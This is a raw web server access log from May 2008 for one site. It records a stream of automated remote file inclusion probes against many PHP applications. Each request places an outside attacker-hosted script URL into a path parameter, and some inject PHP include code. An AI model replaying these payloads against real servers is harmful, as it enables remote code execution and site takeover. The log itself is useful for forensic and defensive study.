99.175.236.97 - - [19/May/2008:10:30:53 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sos.org.uk/cbcbcb/.a/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:10:30:54 -0700] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:10:30:57 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:10:30:57 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:10:30:58 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
70.84.182.98 - - [19/May/2008:10:31:13 -0700] "GET /logs/access_080312.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.188.60.54 - - [19/May/2008:10:31:33 -0700] "GET //include.php?path[docroot]=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.11.122 - - [19/May/2008:10:31:48 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
99.175.236.97 - - [19/May/2008:10:31:53 -0700] "GET /logs/access_080121.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sos.org.uk/cbcbcb/.a/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.11.122 - - [19/May/2008:10:31:56 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.68.162 - - [19/May/2008:10:32:01 -0700] "GET //includes/db_adodb.php?baseDir=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:10:32:11 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.220.207.181 - - [19/May/2008:10:32:24 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
74.220.207.181 - - [19/May/2008:10:32:24 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
74.220.207.181 - - [19/May/2008:10:32:25 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:10:32:26 -0700] "GET /logs/access_080313.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.248.101.69 - - [19/May/2008:10:32:33 -0700] "GET /logs/access_080218.log/cart/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.32.94.50 - - [19/May/2008:10:33:02 -0700] "GET /modules/My_eGallery/index.php?basepath=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
216.32.94.50 - - [19/May/2008:10:33:06 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
75.125.161.162 - - [19/May/2008:10:33:09 -0700] "GET /logs/access_080225.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.161.162 - - [19/May/2008:10:33:10 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.161.162 - - [19/May/2008:10:33:10 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.44.60 - - [19/May/2008:10:33:11 -0700] "GET /modules/My_eGallery/index.php?basepath=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
208.116.44.60 - - [19/May/2008:10:33:13 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
78.108.155.178 - - [19/May/2008:10:33:19 -0700] "GET /logs/access_071225.log/index.php?pag=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.32.94.50 - - [19/May/2008:10:33:25 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
216.32.94.50 - - [19/May/2008:10:33:25 -0700] "GET /modules/My_eGallery/index.php?basepath=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
78.108.155.178 - - [19/May/2008:10:33:29 -0700] "GET /index.php?pag=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
89.248.101.69 - - [19/May/2008:10:33:50 -0700] "GET /logs/access_080327.log/cart/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
99.175.236.97 - - [19/May/2008:10:34:19 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.203.150 - - [19/May/2008:10:34:23 -0700] "GET /logs/access_071219.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:10:34:26 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:10:34:27 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:10:34:33 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:10:34:33 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:10:34:33 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.203.150 - - [19/May/2008:10:34:44 -0700] "GET /logs/access_071220.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:10:34:48 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://1nb0x.iespana.es/t3st?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:10:34:48 -0700] "GET /modules/My_eGallery/index.php?basepath=http://1nb0x.iespana.es/t3st?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:10:34:48 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://1nb0x.iespana.es/t3st?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.195.11.193 - - [19/May/2008:10:34:54 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sos.org.uk/cbcbcb/.a/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.11.122 - - [19/May/2008:10:35:39 -0700] "GET //includes/db_adodb.php?baseDir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:10:35:43 -0700] "GET /logs//?mosConfig_absolute_path=http://freewebs.com/alb_rinia/test.txt?? HTTP/1.1" 200 48133 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:10:35:49 -0700] "GET //?mosConfig_absolute_path=http://freewebs.com/alb_rinia/test.txt?? HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
200.195.11.193 - - [19/May/2008:10:35:55 -0700] "GET /logs/access_080119.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sos.org.uk/cbcbcb/.a/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.195.11.193 - - [19/May/2008:10:35:55 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sos.org.uk/cbcbcb/.a/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.195.11.193 - - [19/May/2008:10:35:56 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sos.org.uk/cbcbcb/.a/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.201.13.98 - - [19/May/2008:10:36:13 -0700] "GET /logs/access_080221.log//addevent.inc.php?agendax_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.201.13.98 - - [19/May/2008:10:36:13 -0700] "GET //addevent.inc.php?agendax_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.201.13.98 - - [19/May/2008:10:36:13 -0700] "GET /logs//addevent.inc.php?agendax_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.17.188.208 - - [19/May/2008:10:36:17 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.17.188.208 - - [19/May/2008:10:36:17 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.17.188.208 - - [19/May/2008:10:36:17 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:10:36:20 -0700] "GET /logs//openi-admin/base/fileloader.php?config[openi_dir]=http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:10:36:20 -0700] "GET //openi-admin/base/fileloader.php?config[openi_dir]=http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
207.7.108.240 - - [19/May/2008:10:36:25 -0700] "GET /logs//trans/trans.php?trans=ko&page=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [19/May/2008:10:36:25 -0700] "GET //trans/trans.php?trans=ko&page=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.192.91 - - [19/May/2008:10:36:46 -0700] "GET /logs/access_080327.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.33.45 - - [19/May/2008:10:36:49 -0700] "GET /logs//include.php?path[docroot]=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.33.45 - - [19/May/2008:10:36:49 -0700] "GET //include.php?path[docroot]=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:10:36:53 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:10:36:53 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
203.22.204.187 - - [19/May/2008:10:36:55 -0700] "GET /logs/access_080225.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.187 - - [19/May/2008:10:36:55 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.187 - - [19/May/2008:10:36:55 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.251.149.21 - - [19/May/2008:10:36:57 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.33.45 - - [19/May/2008:10:37:00 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.33.45 - - [19/May/2008:10:37:00 -0700] "GET //include.php?path[docroot]=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.33.45 - - [19/May/2008:10:37:00 -0700] "GET /logs//include.php?path[docroot]=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
80.67.23.140 - - [19/May/2008:10:37:23 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://scaneru.nm.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.140 - - [19/May/2008:10:37:23 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://scaneru.nm.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.201.13.98 - - [19/May/2008:10:37:27 -0700] "GET /logs//addevent.inc.php?agendax_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.201.13.98 - - [19/May/2008:10:37:27 -0700] "GET //addevent.inc.php?agendax_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.115.228.135 - - [19/May/2008:10:37:35 -0700] "GET /logs/access_080225.log//public/displayCategory.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.115.228.135 - - [19/May/2008:10:37:35 -0700] "GET //public/displayCategory.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.115.228.135 - - [19/May/2008:10:37:35 -0700] "GET /logs//public/displayCategory.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.195.11.193 - - [19/May/2008:10:37:39 -0700] "GET /logs/access_080121.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sos.org.uk/cbcbcb/.a/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
75.125.161.162 - - [19/May/2008:10:38:17 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.161.162 - - [19/May/2008:10:38:17 -0700] "GET //include.php?path[docroot]=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.161.162 - - [19/May/2008:10:38:17 -0700] "GET /logs//include.php?path[docroot]=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.187 - - [19/May/2008:10:38:19 -0700] "GET //includes/db_adodb.php?baseDir=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:10:38:36 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:10:38:42 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:10:38:44 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
67.201.13.98 - - [19/May/2008:10:38:51 -0700] "GET /logs/access_080109.log//addevent.inc.php?agendax_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:10:39:06 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:10:39:06 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:10:39:06 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:10:39:11 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:10:39:16 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:10:39:18 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
66.132.204.166 - - [19/May/2008:10:39:28 -0700] "GET /logs/access_080312.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.68.162 - - [19/May/2008:10:39:40 -0700] "GET /logs/access_080127.log//includes/db_adodb.php?baseDir=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.68.162 - - [19/May/2008:10:39:40 -0700] "GET //includes/db_adodb.php?baseDir=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.68.162 - - [19/May/2008:10:39:40 -0700] "GET /logs//includes/db_adodb.php?baseDir=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.16.254.7 - - [19/May/2008:10:39:40 -0700] "GET //index2.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.16.254.7 - - [19/May/2008:10:39:41 -0700] "GET /logs//index2.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.16.254.7 - - [19/May/2008:10:39:42 -0700] "GET /logs/access_080405.log//index2.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.201.13.98 - - [19/May/2008:10:39:55 -0700] "GET //addevent.inc.php?agendax_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:10:40:08 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:10:40:14 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:10:40:15 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.119.2 - - [19/May/2008:10:40:31 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.116.91.54 - - [19/May/2008:10:40:57 -0700] "GET /logs/extras/ext_cats.php?dir_path=http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
203.116.91.54 - - [19/May/2008:10:41:02 -0700] "GET /extras/ext_cats.php?dir_path=http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
66.7.203.150 - - [19/May/2008:10:41:16 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.89.31.102 - - [19/May/2008:10:41:18 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.102 - - [19/May/2008:10:41:18 -0700] "GET //include.php?path[docroot]=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.102 - - [19/May/2008:10:41:18 -0700] "GET /logs//include.php?path[docroot]=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.203.150 - - [19/May/2008:10:41:23 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
213.251.149.21 - - [19/May/2008:10:41:35 -0700] "GET /logs/access_071220.log//modules/xfsection/modify.php?dir_module=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.251.149.21 - - [19/May/2008:10:41:36 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.251.149.21 - - [19/May/2008:10:41:36 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.102 - - [19/May/2008:10:41:50 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
